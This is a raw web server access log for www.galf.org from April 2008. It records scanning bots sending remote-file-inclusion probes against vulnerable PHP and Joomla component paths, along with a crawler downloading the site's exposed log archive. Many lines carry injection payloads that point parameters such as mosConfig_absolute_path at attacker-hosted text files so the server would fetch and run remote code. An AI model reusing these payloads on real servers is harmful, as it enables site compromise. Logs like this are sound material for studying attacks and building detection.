62.117.106.4 - - [20/Apr/2008:18:01:20 -0700] "GET //?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:01:21 -0700] "GET /logs//?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 200 7378 "-" "libwww-perl/5.805" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:02:08 -0700] "GET /logs/access_070917.log//?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.232.156.130 - - [20/Apr/2008:18:05:40 -0700] "GET /logs/access_080107.log//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [20/Apr/2008:18:05:40 -0700] "GET //error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [20/Apr/2008:18:05:40 -0700] "GET /logs//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [20/Apr/2008:18:06:53 -0700] "GET /logs/access_071029.log//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
80.71.36.82 - - [20/Apr/2008:18:08:09 -0700] "GET /logs/access_071022.log//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [20/Apr/2008:18:08:09 -0700] "GET //index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [20/Apr/2008:18:08:09 -0700] "GET /logs//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.137.39 - - [20/Apr/2008:18:08:11 -0700] "GET /logs/access_080113.log/index.php?p=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.137.39 - - [20/Apr/2008:18:08:12 -0700] "GET /index.php?p=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.137.39 - - [20/Apr/2008:18:08:12 -0700] "GET /logs/index.php?p=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
80.71.36.82 - - [20/Apr/2008:18:08:44 -0700] "GET /logs/access_070910.log//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.245.189 - - [20/Apr/2008:18:11:41 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
64.119.182.47 - - [20/Apr/2008:18:12:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
64.119.182.47 - - [20/Apr/2008:18:12:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:13:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:13:32 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:13:56 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 2697395 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:13:59 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:13:59 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:00 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:00 -0700] "GET /logs/ HTTP/1.0" 200 7357 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:01 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:01 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:03 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:03 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:14:57 -0700] "GET /logs/access_080317.log HTTP/1.0" 200 9589685 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:16:05 -0700] "GET /logs/access_071022.log HTTP/1.0" 200 7764233 "-" "Mail.Ru/1.0" "www.galf.org"
66.45.231.226 - - [20/Apr/2008:18:17:00 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.45.231.226 - - [20/Apr/2008:18:17:00 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.45.231.226 - - [20/Apr/2008:18:17:01 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:17:02 -0700] "GET /logs/access_080331.log HTTP/1.0" 200 9494383 "-" "Mail.Ru/1.0" "www.galf.org"
216.146.28.254 - - [20/Apr/2008:18:17:53 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.146.28.254 - - [20/Apr/2008:18:17:58 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:18:21 -0700] "GET /logs/access_080107.log HTTP/1.0" 200 10974246 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:18:44 -0700] "GET /logs/access_070813.log HTTP/1.0" 200 2685732 "-" "Mail.Ru/1.0" "www.galf.org"
66.45.231.226 - - [20/Apr/2008:18:18:45 -0700] "GET /logs/access_071231.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:19:51 -0700] "GET /logs/access_071217.log HTTP/1.0" 200 9747622 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:20:36 -0700] "GET /logs/access_071126.log HTTP/1.0" 200 8626894 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:21:42 -0700] "GET /logs/access_080303.log HTTP/1.0" 200 8622783 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:23:38 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 10543588 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:24:06 -0700] "GET /logs/access_070917.log HTTP/1.0" 200 3385779 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:24:30 -0700] "GET /logs/access_070826.log HTTP/1.0" 200 3505162 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:25:26 -0700] "GET /logs/access_080407.log HTTP/1.0" 200 10280613 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:26:02 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 6023344 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:26:10 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1241384 "-" "Mail.Ru/1.0" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:18:26:16 -0700] "GET /logs/access_070917.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:18:26:16 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:18:26:16 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:27:23 -0700] "GET /logs/access_071203.log HTTP/1.0" 200 6874512 "-" "Mail.Ru/1.0" "www.galf.org"
203.22.204.188 - - [20/Apr/2008:18:27:47 -0700] "GET /logs/access_070917.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [20/Apr/2008:18:27:47 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [20/Apr/2008:18:27:47 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:28:11 -0700] "GET /logs/access_071112.log HTTP/1.0" 200 7742298 "-" "Mail.Ru/1.0" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:18:28:17 -0700] "GET /logs/access_070917.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:18:28:19 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:18:28:19 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:29:10 -0700] "GET /logs/access_080421.log HTTP/1.0" 200 9278820 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:29:41 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 2478763 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:30:03 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 2587370 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:30:12 -0700] "GET /logs/access_071029.log HTTP/1.0" 200 1274660 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:30:47 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 2655746 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:31:10 -0700] "GET /logs/access_070730.log HTTP/1.0" 200 2917075 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:32:10 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 6477199 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:32:20 -0700] "GET /logs/access_071015.log HTTP/1.0" 200 1180619 "-" "Mail.Ru/1.0" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:33:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.201.82.63 - - [20/Apr/2008:18:33:24 -0700] "GET /logs/access_071231.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:33:29 -0700] "GET /logs/access_080324.log HTTP/1.0" 200 10612928 "-" "Mail.Ru/1.0" "www.galf.org"
122.201.82.63 - - [20/Apr/2008:18:33:29 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:33:31 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
122.201.82.63 - - [20/Apr/2008:18:33:35 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.152 - - [20/Apr/2008:18:33:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.21.113 - - [20/Apr/2008:18:33:47 -0700] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:34:44 -0700] "GET /logs/access_071119.log HTTP/1.0" 200 9760965 "-" "Mail.Ru/1.0" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:35:21 -0700] "GET /logs/access_080107.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:35:21 -0700] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:35:22 -0700] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:35:27 -0700] "GET /logs/access_071028.log HTTP/1.0" 200 7330519 "-" "Mail.Ru/1.0" "www.galf.org"
122.201.82.63 - - [20/Apr/2008:18:35:28 -0700] "GET /logs/access_080114.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:35:30 -0700] "GET /logs/access.log HTTP/1.0" 200 39748 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:35:42 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 1267267 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:36:13 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 2659344 "-" "Mail.Ru/1.0" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:45 -0700] "GET /logs/access_080107.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:45 -0700] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:45 -0700] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:57 -0700] "GET /logs/access_080107.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:57 -0700] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:36:57 -0700] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:37:32 -0700] "GET /logs/access_071224.log HTTP/1.0" 200 10202332 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:37:59 -0700] "GET /logs/access_071001.log HTTP/1.0" 200 5105755 "-" "Mail.Ru/1.0" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:38:54 -0700] "GET /logs/access.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.92.23.94 - - [20/Apr/2008:18:38:55 -0700] "GET /logs/access.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:38:59 -0700] "GET /logs/access.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:39:28 -0700] "GET /logs/access_080310.log HTTP/1.0" 200 10577858 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:39:31 -0700] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:39:43 -0700] "GET /logs/access_080107.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:39:43 -0700] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:39:43 -0700] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:39:58 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 3646185 "-" "Mail.Ru/1.0" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:18:40:14 -0700] "GET /logs/access_070917.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:18:40:14 -0700] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:18:40:14 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:18:40:20 -0700] "GET /logs/access_080107.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:18:40:20 -0700] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:18:40:20 -0700] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:40:36 -0700] "GET /logs/access_070924.log HTTP/1.0" 200 5349452 "-" "Mail.Ru/1.0" "www.galf.org"
194.85.94.120 - - [20/Apr/2008:18:41:08 -0700] "GET /logs/access.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:41:46 -0700] "GET /logs/access_071105.log HTTP/1.0" 200 6430467 "-" "Mail.Ru/1.0" "www.galf.org"
195.19.33.141 - - [20/Apr/2008:18:42:44 -0700] "GET /logs/access_071029.log//classes/adodbt/sql.php?classes_dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.19.33.141 - - [20/Apr/2008:18:42:44 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.19.33.141 - - [20/Apr/2008:18:42:45 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.237.76.146 - - [20/Apr/2008:18:42:57 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
222.237.76.146 - - [20/Apr/2008:18:42:57 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:18:43:13 -0700] "GET /logs/access.log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:43:21 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 7031945 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:44:18 -0700] "GET /logs/access_071014.log HTTP/1.0" 200 7504491 "-" "Mail.Ru/1.0" "www.galf.org"
195.19.33.141 - - [20/Apr/2008:18:44:36 -0700] "GET /logs/access_070820.log//classes/adodbt/sql.php?classes_dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:44:56 -0700] "GET /logs/access_080310.log/samplenewspublish.php?path[docroot]=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:44:56 -0700] "GET /samplenewspublish.php?path[docroot]=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.122.239 - - [20/Apr/2008:18:45:06 -0700] "GET /logs/access_071029.log//classes/adodbt/sql.php?classes_dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.232.122.239 - - [20/Apr/2008:18:45:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.232.122.239 - - [20/Apr/2008:18:45:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:45:18 -0700] "GET /logs/access_071210.log HTTP/1.0" 200 7944900 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:45:29 -0700] "GET /logs/access_070709.log HTTP/1.0" 200 1121534 "-" "Mail.Ru/1.0" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:45:37 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:45:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.62.120.69 - - [20/Apr/2008:18:45:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:46:02 -0700] "GET /logs/access_080204.log HTTP/1.0" 200 4645442 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:46:03 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mail.Ru/1.0" "www.galf.org"
72.232.122.239 - - [20/Apr/2008:18:46:28 -0700] "GET /logs/access_070820.log//classes/adodbt/sql.php?classes_dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:46:44 -0700] "GET /logs/access_080107.log/index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:46:45 -0700] "GET /index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:46:45 -0700] "GET /logs/index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:47:03 -0700] "GET /logs/access_080113.log HTTP/1.0" 200 9591100 "-" "Mail.Ru/1.0" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:47:38 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 3278788 "-" "Mail.Ru/1.0" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:47:53 -0700] "GET /logs/access.log/index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.55.206 - - [20/Apr/2008:18:48:09 -0700] "GET /logs/access_070723.log HTTP/1.0" 200 4087522 "-" "Mail.Ru/1.0" "www.galf.org"
